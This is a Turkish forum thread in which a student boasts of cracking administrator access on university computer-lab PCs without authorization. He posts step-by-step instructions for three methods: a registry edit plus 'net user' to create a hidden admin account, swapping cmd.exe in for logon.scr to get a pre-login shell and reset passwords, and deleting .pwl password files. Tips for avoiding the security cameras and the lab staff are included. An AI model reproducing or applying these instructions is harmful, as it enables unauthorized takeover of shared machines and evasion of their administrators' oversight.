admin_hack:)

[revolter00]

VEEEE SONUNDAA...

2 aylik bir ugrastan sonra biraz geçte olsa pclab lardaki pclerin
"admin account pass"larini kirmayi basarmis bulunmaktayim. (alkis effecti )

umarim serverdan beni farkeden olmamistir.. (gulme effecti )

bu iste herturlu emegi gecen cse boumunden adini guvenlik sebebiyle aciklayamadigim "hack-crack" ortagima sonsuz tesekkurlerimi bir borc bilirim...

ve gelelim sadede:[/b]
3 ayri yontem war bunlardan son ikisi sadece fat32 hdd için geçerlidir.. ilk yontem xp pro sp2 de kulldandigim ve sonuca ulastigimdir. 2. si ise biraz daha kolaydir ama xpde diil win2000 de ve fat32 file system de işe yariyor..

malzemeler:
guvenlik kameralarinin az hedefinde olan bir adet pc = 1 adet



yapilmasi gerekenler

"Safe Mode" dan pc yi açip "regedit" ten

HKEY_LOCAL_MACHINE/software/Microsoft/Windows NT/Current Version/Winlogon/Special accounts/UserList

konumuna geliyoruz..

Buraya yeni bir DWORD entry si ekleyip "Value Data=1 olarak ayarlayip kaydediyoruz..

Yeni eklediğimiz entry nin ismini tr karakter icermeyen herhangi bir isim ile deistiriyoruz ve sonuna asterix " * " koyup onayliyip, kaydedip reg editoru kapatiyoruz.. (ben isim olarak RVLTR* sectim )

hemen arkasindan cmd acip asaidaki komutu giriyoruz:
(RVLTR* yazan yerde sizin DWORD entrysine verdiginiz isim olmasi gerekir)

net user RVLTR*

sizden yeni sifrenizi girmenizi isteyecek ve arkasindan tekrar yazarak onaylamaniz gerekecek, fakat bu esnada yazdiğiniz karakterler hiçbir şekilde gorunmeyecek


pcyi reboot edip yeni admin account unuzla girebilirsiniz..

[revolter00]

2 yol: (SERVER PC YADA WIN2000 ICIN IDEAL ama ntfs de calişmayabilir simdiden soyliim )
[/i]


"Safe Mode" da pc yi açip cmd de sunlari yaziyoruz:


cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

pc reboottan sonra unprotected dos mode oolarak acilcak ve


net user USERNAME PASSWORD


yazdiktan sonra admin olarak sisteme girebiliriz..

[revolter00]

3. yol cok eski sistemlerde kullanabileceiniz bilinen bi yol ama win2000 de de iişe yariyor..

8. sinifta yine labdaki pclere "ozamanlar dial up wardi tabi" girip icq faln takilirdik arklarla.. hatta bazi dialup sifrelerini alip ewden kullanirdik ! ;D

cok basit bi yol olduunu solemiştim.. sadece *.pwl yazip arama yapin ve cıkan herşeyi (isterseniz yedeğini alip) silin , ister safe modda acip dostan silin isterseniz GUI den farketmez.. reboot dan sonra sistem yeni şifre isteyecektir, girin ve gidin

[revolter00]

umarim bunlar oole sagda solda bkolay bulunur seyler diildir yoksa oyleyse 2 ay bosuna mi bekledim ben yaws aradiimda bulamamiştim

[tc_brown]

anlamadým çünkü okumadým ;D

[revolter00]

COK KARİSİK DİİL, ZATEN İLK KİSİM YETİYO ;d

[revolter00]

doğru soyleyeni 9 server dan banlarlar...

ne alaka bilmiyom ama bu cumle ile giris yapmak istedim..

lab daki pclerin birkacinda, tamam..tamam.. nerdeyse hepsinde,.. "HAILSATAN" olarak acmiş oldugum admin accountu "DPC elemanlari" tarafindan silinmis.. ve isin kotu yani sifre deişmiş ve daha da kotusu dos icinde password protection koymuslar..

anlasilan workstation daki reg entryleri serverdan bbeklenen onayi alamayinca actiğim admin accountlari 7 gunluk timeout dolup gitmis..

ve son bi flash shock daha.. pc lab lar da artik 2. kamera war.. kısaca hack yatti...

[gremlin]

baba bitirdin bizi bütün sırlar açıya çıkacak şimdi

[gremlin]

ilk yöntemi kendi üstümde denemiştim galiba dosyalar tanıdık geliyo ikinci yöntemi ilk kez görüyom denedim olmadı